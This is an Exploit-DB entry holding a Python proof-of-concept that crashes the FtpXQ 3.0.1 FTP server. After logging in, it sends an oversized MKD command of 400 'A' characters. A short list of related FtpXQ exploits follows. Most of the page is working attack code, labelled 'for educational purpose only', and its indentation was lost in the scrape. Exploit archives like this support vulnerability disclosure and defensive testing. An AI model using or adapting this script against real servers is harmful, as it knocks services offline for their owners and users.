| EDB-ID: 10160 | Author: Marc Doudiet | Published: 2009-11-17 | |
| CVE: N/A | Type: Dos | Platform: Windows | |
E-DB Verified:
 |
Exploit:
 Download
/
View Raw
|
Vulnerable App:
|
|
#!/usr/bin/python
banner=(
"*************************\r\n"
"* Exploit Title: FtpXQ authenticated remote Dos "
"* (trial on http://www.datawizard.net/Products/FtpXQ/Setup.EXE) Version 3.0.1 \r\n"
"* Tested on XP sp2 english"
"* Needs write access --> vuln on MKD command\r\n"
"* Vulnerability found by Marc Doudiet\r\n"
"* For educational purpose only\r\n"
"* Proof of concept code\r\n")
import socket
import sys
def Usage():
print ("Usage: ./ftpxq.py <Username> <password> <host>\n")
string="A"*400
def start(username, password, hostname):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print banner
try:
s.connect((hostname, 21))
print "[-] Connecting to the FTP ..."
except:
print ("[-] Connection error!")
sys.exit(1)
s.recv(1024)
s.send('USER '+username+'\r\n')
s.recv(1024)
s.send('PASS '+password+'\r\n')
s.recv(1024)
print "[-] Sending evil buffer ...\r\n"
s.send('MKD '+string+'\r\n')
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
print "[-] Exploit seems to work"
sys.exit(0)
Related Exploits
Trying to match setup file: 689c18f81065e027d5b1dbd599294084Other Possible E-DB Search Terms: FtpXQ 3.0, FtpXQ
| Date | D | V | Title | Author |
|---|---|---|---|---|
| 2006-10-24 | |
|
FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service | Federico Fazzi |
| 2009-09-14 | |
|
FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service | PLATEN |
| 2001-02-28 | |
|
datawizards ftpxq 2.0.93 - Directory Traversal | joetesta |